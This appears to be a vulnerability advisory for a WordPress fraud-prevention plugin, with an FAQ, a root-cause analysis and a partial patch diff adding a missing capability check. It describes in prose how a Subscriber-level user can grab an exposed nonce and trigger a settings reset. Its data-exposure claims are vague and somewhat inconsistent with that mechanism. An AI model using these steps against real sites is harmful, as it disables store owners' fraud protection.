What is CVE-2026-24553?

CVE-2026-24553 is a medium-severity vulnerability affecting the Fraud Prevention For WooCommerce plugin for WordPress, specifically versions up to and including 2.3.2. It allows authenticated users with Subscriber-level access or higher to expose sensitive user or configuration data through an insufficiently protected AJAX endpoint.

Who is affected by this vulnerability?

Users of the Fraud Prevention For WooCommerce plugin who are running versions 2.3.2 or earlier are affected. This includes any WordPress installations where authenticated users with Subscriber access can exploit the vulnerability to access sensitive information.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Fraud Prevention For WooCommerce plugin installed on your WordPress site. If it is version 2.3.2 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is fixed in version 2.3.3 of the Fraud Prevention For WooCommerce plugin. Updating to this version or later will mitigate the risk associated with CVE-2026-24553.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk to sites with vulnerable versions. Administrators should prioritize addressing this issue to prevent potential data exposure.

What is the root cause of this vulnerability?

The vulnerability is caused by a lack of capability checks in the `wcblu_reset_settings()` function, which allows any authenticated user with a valid nonce to execute a function that can expose sensitive data. The nonce was also accessible to low-privileged users.

How does the proof of concept demonstrate the issue?

The proof of concept demonstrates how an attacker can authenticate as a Subscriber, extract the nonce from the page source, and then send a crafted request to reset the plugin settings. This showcases the ease with which sensitive information can be exposed.

What data could be exposed if this vulnerability is exploited?

If exploited, attackers may reset the plugin’s configuration, which could disrupt fraud prevention measures and expose sensitive operational data. This could lead to further attacks or the compromise of the WooCommerce store’s security.

What steps can I take to mitigate this vulnerability until I can update?

While the best mitigation is to update to version 2.3.3, you can temporarily restrict access to the plugin’s admin pages or limit the capabilities of Subscriber-level users until the update is applied.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately review your logs for unauthorized access, change passwords for all users, and consider restoring from a backup prior to the exploitation. Conduct a full security audit of your site.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the Common Vulnerabilities and Exposures (CVE) database for updates related to your plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24553: Fraud Prevention For Woocommerce <= 2.3.2 – Authenticated (Subscriber+) Information Exposure (woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers)

CVE ID CVE-2026-24553

Plugin woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers

Severity Medium (CVSS 4.3)

CWE 200

Vulnerable Version 2.3.2

Patched Version 2.3.3

Disclosed January 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24553:
The Fraud Prevention for WooCommerce and EDD plugin for WordPress, versions up to and including 2.3.2, contains an information exposure vulnerability. This flaw allows authenticated attackers with Subscriber-level access or higher to extract sensitive user and configuration data via an insufficiently protected AJAX endpoint.

Root Cause:
The vulnerability resides in the `wcblu_reset_settings()` function within `/admin/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-admin.php`. The function at line 607 only performed a nonce verification via `check_ajax_referer(‘wcblu-ajax-nonce’, ‘nonce’)` but lacked a capability check. This allowed any authenticated user with a valid nonce to trigger the function. The nonce itself was exposed to low-privileged users via the `wp_localize_script()` call on line 121, which made the `adminajax` object containing the nonce available in the page source.

Exploitation:
An attacker with Subscriber-level access can first load any plugin admin page to obtain the exposed nonce from the `adminajax` JavaScript object. They then send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wcblu_reset_settings` and the `nonce` parameter set to the captured value. This request triggers the vulnerable function, which executes `update_option(‘wcblu_option’, ”)`, resetting the plugin’s configuration and potentially exposing default or previously configured sensitive data in the response or subsequent plugin behavior.

Patch Analysis:
The patch adds a capability check to the `wcblu_reset_settings()` function. After the nonce verification, the patch inserts a `current_user_can(‘manage_woocommerce’)` check. If the user lacks this capability, the function sends a JSON error with a 403 status code and terminates. This restricts the function’s execution to users with WooCommerce management permissions. The patch also renames the localized script variable from `adminajax` to `wblp_order_ajax` on line 121, though this change alone does not mitigate the vulnerability without the capability check.

Impact:
Successful exploitation allows attackers to reset the plugin’s configuration, potentially disrupting fraud prevention rules and exposing sensitive operational data. Attackers can infer configuration details from the plugin’s behavior post-reset or from error messages. This data exposure can aid in further attacks against the WooCommerce store, such as bypassing fraud detection mechanisms or mapping the store’s security posture.

Differential between vulnerable and patched code

Code Diff

--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-admin.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-admin.php
@@ -118,7 +118,7 @@
                 $this->version,
                 false
             );
-            wp_localize_script( 'jquery-wblp-order-widget-js', 'adminajax', array(
+            wp_localize_script( 'jquery-wblp-order-widget-js', 'wblp_order_ajax', array(
                 'ajaxurl' => admin_url( 'admin-ajax.php' ),
                 'nonce'   => wp_create_nonce( 'wcblu-ajax-nonce' ),
             ) );
@@ -607,6 +607,11 @@
      */
     public function wcblu_reset_settings() {
         check_ajax_referer( 'wcblu-ajax-nonce', 'nonce' );
+        if ( !current_user_can( 'manage_woocommerce' ) ) {
+            wp_send_json_error( array(
+                'message' => esc_html__( 'You are not allowed to reset settings.', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' ),
+            ), 403 );
+        }
         update_option( 'wcblu_option', '' );
         die;
     }
@@ -722,6 +727,8 @@
             $wcbfc_proxy_order_weight = filter_input( INPUT_POST, 'wcbfc_proxy_order_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_international_order = filter_input( INPUT_POST, 'wcbfc_international_order', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_international_order_weight = filter_input( INPUT_POST, 'wcbfc_international_order_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
+            $wcbfc_unknown_origin = filter_input( INPUT_POST, 'wcbfc_unknown_origin', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
+            $wcbfc_unknown_origin_weight = filter_input( INPUT_POST, 'wcbfc_unknown_origin_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_suspecius_email = filter_input( INPUT_POST, 'wcbfc_suspecius_email', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_suspecius_email_list = filter_input(
                 INPUT_POST,
@@ -730,6 +737,8 @@
                 FILTER_REQUIRE_ARRAY
             );
             $wcbfc_suspecious_email_weight = filter_input( INPUT_POST, 'wcbfc_suspecious_email_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
+            $wcbfc_blocked_user_email_check = filter_input( INPUT_POST, 'wcbfc_blocked_user_email_check', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
+            $wcbfc_blocked_user_email_weight = filter_input( INPUT_POST, 'wcbfc_blocked_user_email_weight', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcbfc_unsafe_countries = filter_input( INPUT_POST, 'wcbfc_unsafe_countries', FILTER_SANITIZE_FULL_SPECIAL_CHARS );
             $wcblu_define_unsafe_countries_list = filter_input(
                 INPUT_POST,
@@ -776,9 +785,13 @@
             $wcbfc_proxy_order_weight = ( empty( $wcbfc_proxy_order_weight ) ? '0' : $wcbfc_proxy_order_weight );
             $wcbfc_international_order = ( empty( $wcbfc_international_order ) ? '0' : $wcbfc_international_order );
             $wcbfc_international_order_weight = ( empty( $wcbfc_international_order_weight ) ? '0' : $wcbfc_international_order_weight );
+            $wcbfc_unknown_origin = ( empty( $wcbfc_unknown_origin ) ? '0' : $wcbfc_unknown_origin );
+            $wcbfc_unknown_origin_weight = ( empty( $wcbfc_unknown_origin_weight ) ? '0' : $wcbfc_unknown_origin_weight );
             $wcbfc_suspecius_email = ( empty( $wcbfc_suspecius_email ) ? '0' : $wcbfc_suspecius_email );
             $wcbfc_suspecius_email_list = ( empty( $wcbfc_suspecius_email_list ) ? array() : $wcbfc_suspecius_email_list );
             $wcbfc_suspecious_email_weight = ( empty( $wcbfc_suspecious_email_weight ) ? '0' : $wcbfc_suspecious_email_weight );
+            $wcbfc_blocked_user_email_check = ( empty( $wcbfc_blocked_user_email_check ) ? '0' : $wcbfc_blocked_user_email_check );
+            $wcbfc_blocked_user_email_weight = ( empty( $wcbfc_blocked_user_email_weight ) ? '0' : $wcbfc_blocked_user_email_weight );
             $wcbfc_unsafe_countries = ( empty( $wcbfc_unsafe_countries ) ? '0' : $wcbfc_unsafe_countries );
             $wcbfc_unsafe_countries_ip = ( empty( $wcbfc_unsafe_countries_ip ) ? '0' : $wcbfc_unsafe_countries_ip );
             $wcblu_define_unsafe_countries_list = ( empty( $wcblu_define_unsafe_countries_list ) ? array() : $wcblu_define_unsafe_countries_list );
@@ -820,9 +833,13 @@
             $wcbluruleoption_array['wcbfc_proxy_order_weight'] = $wcbfc_proxy_order_weight;
             $wcbluruleoption_array['wcbfc_international_order'] = $wcbfc_international_order;
             $wcbluruleoption_array['wcbfc_international_order_weight'] = $wcbfc_international_order_weight;
+            $wcbluruleoption_array['wcbfc_unknown_origin'] = $wcbfc_unknown_origin;
+            $wcbluruleoption_array['wcbfc_unknown_origin_weight'] = $wcbfc_unknown_origin_weight;
             $wcbluruleoption_array['wcbfc_suspecius_email'] = $wcbfc_suspecius_email;
             $wcbluruleoption_array['wcbfc_suspecius_email_list'] = $wcbfc_suspecius_email_list;
             $wcbluruleoption_array['wcbfc_suspecious_email_weight'] = $wcbfc_suspecious_email_weight;
+            $wcbluruleoption_array['wcbfc_blocked_user_email_check'] = $wcbfc_blocked_user_email_check;
+            $wcbluruleoption_array['wcbfc_blocked_user_email_weight'] = $wcbfc_blocked_user_email_weight;
             $wcbluruleoption_array['wcbfc_unsafe_countries'] = $wcbfc_unsafe_countries;
             $wcbluruleoption_array['wcbfc_unsafe_countries_ip'] = $wcbfc_unsafe_countries_ip;
             $wcbluruleoption_array['wcblu_define_unsafe_countries_list'] = $wcblu_define_unsafe_countries_list;
@@ -1170,13 +1187,25 @@
         echo esc_html( $label );
         ?></span>
 		<div class="mb-score-label-list">
-			<ul style="color:<?php
+			<button type="button" class="button wcblu-fc-details-toggle" data-show-text="<?php
+        esc_attr_e( 'Show more', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+        ?>" data-hide-text="<?php
+        esc_attr_e( 'Hide details', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+        ?>">
+				<span class="wcblu-toggle-text"><?php
+        esc_html_e( 'Show more', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+        ?></span>
+				<span class="dashicons dashicons-arrow-down-alt2 wcblu-toggle-icon" aria-hidden="true"></span>
+			</button>
+			<div class="wcblu-fc-details-content" style="display: none;">
+				<ul style="color:<?php
         echo esc_attr( $risk_label_color );
         ?>">
-				<?php
+					<?php
         echo wp_kses( $score_lables, $allow_html_args );
         ?>
-			</ul>
+				</ul>
+			</div>
 		</div>

 		<script type="text/javascript">
@@ -1189,11 +1218,22 @@
 					jQuery('.wcblu_chart').val(Math.ceil(this.value)).trigger('change');
 				}
 			});
-			jQuery('.mb-score-label-list').click( function(){
-				jQuery(this).find('ul').fadeToggle();
-			});
-			jQuery(".mb-score-label-list ul").click(function(e) {
-				e.stopPropagation();
+			jQuery('.wcblu-fc-details-toggle').off('click').on('click', function(e) {
+				e.preventDefault();
+				var $button = jQuery(this);
+				var $content = $button.closest('.mb-score-label-list').find('.wcblu-fc-details-content');
+				var $text = $button.find('.wcblu-toggle-text');
+				var $icon = $button.find('.wcblu-toggle-icon');
+				$content.slideToggle(200);
+				setTimeout(function() {
+					if ($content.is(':visible')) {
+						$text.text($button.data('hide-text') || 'Hide details');
+						$icon.removeClass('dashicons-arrow-down-alt2').addClass('dashicons-arrow-up-alt2');
+					} else {
+						$text.text($button.data('show-text') || 'Show more');
+						$icon.removeClass('dashicons-arrow-up-alt2').addClass('dashicons-arrow-down-alt2');
+					}
+				}, 250);
 			});
 		</script>
 		<?php
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/dots-dashboard.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/dots-dashboard.php
@@ -202,6 +202,52 @@
                     </div>
                     </div>
                 </div>
+                <div class="wcblu-top-ten wcblu-main-chart wcblu-recent-orders" style="grid-column: span 6 / auto;">
+                    <div class="content">
+                        <div class="wcblu-table-title">
+                            <span class="wcblu-title"><?php
+    esc_html_e( 'Recent Orders 🔒', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                        </div>
+                        <div class="wcblu-table">
+                            <div class="wcblu-table-header">
+                                <div><?php
+    esc_html_e( 'Risk', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Name', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Spent', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Status', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                            </div>
+                            <div class="wcblu-table-row">
+                                <div class="wcblu-table-no-item"><?php
+    esc_html_e( 'Upgrade to unlock recent orders.', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                            </div>
+                        </div>
+                    </div>
+                </div>
+                <div class="wcblu-top-ten wcblu-main-chart wcblu-orders-breakdown" style="grid-column: span 6 / auto;">
+                    <div class="content">
+                        <div class="wcblu-table-title">
+                            <span class="wcblu-title"><?php
+    esc_html_e( 'Orders Breakdown 🔒', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                        </div>
+                        <div class="wcblu-recent-order-data-chart-main">
+                            <img src="<?php
+    echo esc_url( WB_PLUGIN_URL . 'admin/images/premium-upgrade-img/premium-fraud-data-graph.png' );
+    ?>" alt="<?php
+    esc_attr_e( 'Orders Breakdown Graph', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?>">
+                        </div>
+                    </div>
+                </div>
             </div>
         </div>
         <!-- Dashboard HTML start -->
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/dots-edd-dashboard.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/dots-edd-dashboard.php
@@ -168,6 +168,52 @@
                     </div>
                     </div>
                 </div>
+                <div class="wcblu-top-ten wcblu-main-chart wcblu-recent-orders" style="grid-column: span 6 / auto;">
+                    <div class="content">
+                        <div class="wcblu-table-title">
+                            <span class="wcblu-title"><?php
+    esc_html_e( 'Recent Orders 🔒', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                        </div>
+                        <div class="wcblu-table">
+                            <div class="wcblu-table-header">
+                                <div><?php
+    esc_html_e( 'Risk', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Name', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Spent', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                                <div><?php
+    esc_html_e( 'Status', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                            </div>
+                            <div class="wcblu-table-row">
+                                <div class="wcblu-table-no-item"><?php
+    esc_html_e( 'Upgrade to unlock recent orders.', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></div>
+                            </div>
+                        </div>
+                    </div>
+                </div>
+                <div class="wcblu-top-ten wcblu-main-chart wcblu-orders-breakdown" style="grid-column: span 6 / auto;">
+                    <div class="content">
+                        <div class="wcblu-table-title">
+                            <span class="wcblu-title"><?php
+    esc_html_e( 'Orders Breakdown 🔒', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                        </div>
+                        <div class="wcblu-recent-order-data-chart-main">
+                            <img src="<?php
+    echo esc_url( WB_PLUGIN_URL . 'admin/images/premium-upgrade-img/premium-fraud-data-graph.png' );
+    ?>" alt="<?php
+    esc_attr_e( 'Orders Breakdown Graph', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?>">
+                        </div>
+                    </div>
+                </div>
             </div>
         </div>
         <!-- Dashboard HTML start -->
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/header/plugin-header.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/header/plugin-header.php
@@ -106,7 +106,7 @@
 $gs_list = ( isset( $wcblu_page ) && 'wcblu-general-settings' === $wcblu_page ? 'active' : '' );
 $rules = ( isset( $wcblu_page ) && 'wcblu-auto-rules' === $wcblu_page ? 'active' : '' );
 $ai_detection = ( isset( $wcblu_page ) && 'wcblu-ai-detection-setting' === $wcblu_page ? 'active' : '' );
-$wcblu_import_export_setting = ( isset( $current_tab ) && 'wcblu-import-export-setting' === $current_tab ? 'active' : '' );
+$wcblu_import_export_setting = ( isset( $wcblu_page ) && 'wcblu-import-export-setting' === $wcblu_page ? 'active' : '' );
 $wcblu_settings_menu = ( isset( $wcblu_page ) && ('wcblu-import-export-setting' === $wcblu_page || 'wcblu-import-export-setting' === $current_tab) ? 'active' : '' );
 $wcblu_free_dashboard = ( isset( $wcblu_page ) && 'wcblu-upgrade-dashboard' === $wcblu_page ? 'active' : '' );
 $wcblu_dashboard = ( isset( $wcblu_page ) && 'wcblu-dashboard' === $wcblu_page ? 'active' : '' );
@@ -191,23 +191,24 @@
                                 </li>

                                 <?php
-$wcblu_settings_page_url = '';
 $wcblu_settings_page_url = add_query_arg( array(
-    'page' => 'wblp-get-started&tab=wblp-get-started',
+    'page' => 'wcblu-import-export-setting',
 ), admin_url( 'admin.php' ) );
+?>
+                                <li>
+                                    <a class="dotstore_plugin <?php
+echo esc_attr( $wcblu_settings_menu );
+?>" href="<?php
+echo esc_url( $wcblu_settings_page_url );
+?>"><?php
+esc_html_e( 'Settings', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+?></a>
+                                </li>
+                                <?php
 if ( wbpfoabfc_fs()->is__premium_only() && wbpfoabfc_fs()->can_use_premium_code() ) {
     ?>
                                     <li>
                                         <a class="dotstore_plugin <?php
-    echo esc_attr( $wcblu_settings_menu );
-    ?>" href="<?php
-    echo esc_url( $wcblu_settings_page_url );
-    ?>"><?php
-    esc_html_e( 'Settings', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
-    ?></a>
-                                    </li>
-                                    <li>
-                                        <a class="dotstore_plugin <?php
     echo esc_attr( $wcblu_account_page );
     ?>" href="<?php
     echo esc_url( wbpfoabfc_fs()->get_account_url() );
@@ -260,8 +261,15 @@
 echo esc_attr( $wcblu_display_submenu );
 ?>">
                     <ul>
-                    <?php
-?>
+                        <li><a class="<?php
+echo esc_attr( $wcblu_import_export_setting );
+?>" href="<?php
+echo esc_url( add_query_arg( array(
+    'page' => 'wcblu-import-export-setting',
+), admin_url( 'admin.php' ) ) );
+?>"><?php
+esc_html_e( 'Import / Export', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+?></a></li>
                         <li><a href="<?php
 echo esc_url( 'https://www.thedotstore.com/plugins/' );
 ?>" target="_blank"><?php
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/wcblu-rule-settings.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/admin/partials/wcblu-rule-settings.php
@@ -694,6 +694,55 @@
                             </div>
                         </td>
                     </tr>
+                    <tr>
+                        <th scope="row" class="titledesc">
+                            <label><?php
+    echo esc_html__( 'Blocked user email match', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?>
+                                <div class="wcbfc-tooltip-rules">
+                                    <span class="wcbfc-tooltiptext wcbfc-tooltip-bottom"><?php
+    echo esc_html( 'Check if the checkout email matches a blocked user email.' );
+    ?></span>
+                                </div>
+                            </label>
+                        </th>
+                        <td>
+                            <div class="wcbfc-control-settings">
+                                <label class="switch" for="wcbfc_blocked_user_email_check">
+                                    <div class="slider round"></div>
+                                </label>
+                                <div class="wcblu_rule_field">
+                                    <input name="wcbfc_blocked_user_email_weight" id="wcbfc_blocked_user_email_weight" type="number" style="width: 5em;" value="0" class="wcbfc_rules_weights" placeholder="" min="0" step="1" max="100">
+                                    <label class="wcbfc-rule-weight-label"><?php
+    echo esc_html__( 'Rule Weight', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></label>
+                                </div>
+                            </div>
+                            <div class="wcbfc-control-points">
+                                <progress max="100" class="wcbfc-progressBar" value=""></progress>
+                                <span class="wcbfc-tooltip progress-tooltip">0</span>
+                                <div class="progress-container">
+                                    <div class="progress-bar">
+                                        <div class="segment good">
+                                            <span class="text"><?php
+    echo esc_html__( 'No Importance', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                                        </div>
+                                        <div class="segment average">
+                                            <span class="text"><?php
+    echo esc_html__( 'Moderate', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                                        </div>
+                                        <div class="segment poor">
+                                            <span class="text"><?php
+    echo esc_html__( 'High Importance', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' );
+    ?></span>
+                                        </div>
+                                    </div>
+                                </div>
+                            </div>
+                        </td>
+                    </tr>
                 </tbody>
             </table>
             <div class="heading_div">
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/includes/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-activator.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/includes/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-activator.php
@@ -72,9 +72,13 @@
             $wcbluruleoption_array['wcbfc_proxy_order_weight']           = '50';
             $wcbluruleoption_array['wcbfc_international_order']          = '1';
             $wcbluruleoption_array['wcbfc_international_order_weight']   = '10';
+            $wcbluruleoption_array['wcbfc_unknown_origin']               = '0';
+            $wcbluruleoption_array['wcbfc_unknown_origin_weight']        = '0';
             $wcbluruleoption_array['wcbfc_suspecius_email']              = '1';
             $wcbluruleoption_array['wcbfc_suspecius_email_list']         = '';
             $wcbluruleoption_array['wcbfc_suspecious_email_weight']      = '5';
+            $wcbluruleoption_array['wcbfc_blocked_user_email_check']     = '0';
+            $wcbluruleoption_array['wcbfc_blocked_user_email_weight']    = '0';
             $wcbluruleoption_array['wcbfc_unsafe_countries']             = '1';
             $wcbluruleoption_array['wcblu_define_unsafe_countries_list'] = '';
             $wcbluruleoption_array['wcbfc_unsafe_countries_weight']      = '25';
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/public/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-public.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/public/class-woocommerce-blocker-prevent-fake-orders-and-blacklist-fraud-customers-public.php
@@ -452,16 +452,16 @@
                 $meta = get_post_meta( $post_id, 'Attempt', true );
                 $meta++;
                 update_post_meta( $post_id, 'Attempt', $meta );
-                update_post_meta( $post_id, 'First Name', filter_input( INPUT_POST, 'billing_first_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Last Name', filter_input( INPUT_POST, 'billing_last_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'City', filter_input( INPUT_POST, 'billing_city', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Country', filter_input( INPUT_POST, 'billing_country', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Phone', filter_input( INPUT_POST, 'billing_phone', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Company', filter_input( INPUT_POST, 'billing_company', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Postcode', filter_input( INPUT_POST, 'billing_postcode', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Address 1', filter_input( INPUT_POST, 'billing_address_1', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Address 2', filter_input( INPUT_POST, 'billing_address_2', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'State', filter_input( INPUT_POST, 'billing_state', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
+                update_post_meta( $post_id, 'First Name', filter_input( INPUT_POST, 'billing_first_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Last Name', filter_input( INPUT_POST, 'billing_last_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'City', filter_input( INPUT_POST, 'billing_city', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Country', filter_input( INPUT_POST, 'billing_country', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Phone', filter_input( INPUT_POST, 'billing_phone', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Company', filter_input( INPUT_POST, 'billing_company', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Postcode', filter_input( INPUT_POST, 'billing_postcode', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Address 1', filter_input( INPUT_POST, 'billing_address_1', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Address 2', filter_input( INPUT_POST, 'billing_address_2', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'State', filter_input( INPUT_POST, 'billing_state', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
                 update_post_meta( $post_id, 'WhereUserBanned', 'Place Order' );
                 $post_status = get_post_status( $post_id );
                 if ( 'trash' === $post_status ) {
@@ -477,16 +477,16 @@
                     'post_type'   => 'blocked_user',
                 );
                 $post_id = wp_insert_post( $user );
-                update_post_meta( $post_id, 'First Name', filter_input( INPUT_POST, 'billing_first_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Last Name', filter_input( INPUT_POST, 'billing_last_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'City', filter_input( INPUT_POST, 'billing_city', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Country', filter_input( INPUT_POST, 'billing_country', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Phone', filter_input( INPUT_POST, 'billing_phone', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Company', filter_input( INPUT_POST, 'billing_company', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Postcode', filter_input( INPUT_POST, 'billing_postcode', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Address 1', filter_input( INPUT_POST, 'billing_address_1', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Address 2', filter_input( INPUT_POST, 'billing_address_2', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'State', filter_input( INPUT_POST, 'billing_state', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
+                update_post_meta( $post_id, 'First Name', filter_input( INPUT_POST, 'billing_first_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Last Name', filter_input( INPUT_POST, 'billing_last_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'City', filter_input( INPUT_POST, 'billing_city', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Country', filter_input( INPUT_POST, 'billing_country', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Phone', filter_input( INPUT_POST, 'billing_phone', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Company', filter_input( INPUT_POST, 'billing_company', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Postcode', filter_input( INPUT_POST, 'billing_postcode', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Address 1', filter_input( INPUT_POST, 'billing_address_1', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
